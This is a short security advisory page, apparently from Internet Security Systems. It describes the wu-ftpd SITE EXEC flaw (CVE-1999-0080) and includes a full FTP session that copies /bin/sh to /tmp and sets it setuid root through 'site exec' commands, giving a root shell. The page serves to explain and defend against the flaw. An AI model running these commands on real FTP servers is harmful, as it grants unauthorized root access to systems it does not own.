Preface: FTP SITE EXEC commandLogo -Internet Security Systems

FTP SITE EXEC command
advICE :Intrusions : 2001305
 FAQ
Oh my gosh, I'm being HACKED!!!
How do I report the hacker to my ISP?
I'm seeing lots of attacks, is this normal?
Summary

Intrusion attempt.

Details

Old versions of FTP servers support this command, which permits undesirable access to the server.

In wu-ftpd versions below 2.2, a vulnerability exists whereby a hacker/cracker can execute a program The following shows a session where "robert" has a legitimate account on the system and is attempting to create a command-line shell that he can run under. 

220 example.com FTP server (Version wu-2.1(1) ready.
Name (example.com:robert): robert
331 Password required for robert.
Password: foobar
230 User robert logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec cp /bin/sh /tmp/.runme"
200-cp /bin/sh /tmp/runme
ftp> quote "site exec chmod 6755 /tmp/.runme"
200-chmod 6755 /tmp/runme
ftp> quit
221 Goodbye.
Now a user (logged in normally) can run a shell with root privileges from the /tmp directory.
 more information
wu-ftpd  
More information about this popular FTP daemon.  
advICE: FTP defense  
How to harden an FTP server against Internet attacks.  
advICE: FTP exploits  
A list of common ways that intruders break into FTP servers.  
CERT: CA-95.16.wu-ftpd.vul   wu-ftpd Misconfiguration Vulnerability
 
CVE-1999-0080   wu-ftp FTP server allows root access via "site exec" command.
  
 
Version appeared:
Privacy Policy |  Copyright Info